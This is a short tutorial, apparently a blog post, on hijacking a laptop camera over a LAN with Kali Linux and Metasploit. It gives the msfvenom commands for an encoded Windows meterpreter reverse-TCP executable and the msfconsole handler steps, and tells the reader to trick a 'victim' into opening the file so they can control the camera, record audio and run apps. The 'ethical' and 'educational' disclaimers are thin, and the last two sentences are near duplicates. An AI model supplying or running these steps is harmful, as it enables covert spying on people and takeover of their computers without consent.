Hack Laptop Camera on lan Using Kali linux

Laptop Camera

Use this technique only for ethical purposes.

Things Required For this process
1. Backtrack or Kali Linux
2. Target must be on LAN

You can hack your way into friend's laptop on LAN by following the given procedure. After hacking you can easily control target's camera to capture pictures or to stream live video like it was done in a season Mr. Robot. There are also other things you can do like voice recording, running apps etc.

For this hack to work, you have to send a file to your victim computer . You can make any type of file like an audio file, word file etc or you can simply use a link to install that file into target PC.

These steps use the sending file method.
Be sure to follow all step carefully .

Step 1:
1.Make File to Send to your taget PC.

Syntax to make file:
msfvenom -p payload lhost='your local ip'  lport=4444 -e cmd/powershell_base64 -i 5 -f exe > path/filename.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=4444 -e cmd/powershell_base64 -i 5 -f exe >  /root/Desktop/file.exe

Step 2:

After Making File 
Open terminal
1: write 'msfcosole'
2: type 'use exploit/multi/handler'
3: type  'set payload windows/meterpreter/reverse_tcp'
4: type 'set LHOST=your ip'
5: type 'set  LPORT=4444'
6: type 'exploit'

7: Sent file to Victim  and he/she have to open file

Write the above commands without apostrophes.

If you follow the given steps carefully, you can easily control someone's PC .
Do not use it to harm someone. it is only for educational purpose.
If you have any problem feel free to comment or contact us.


We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.

We will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.
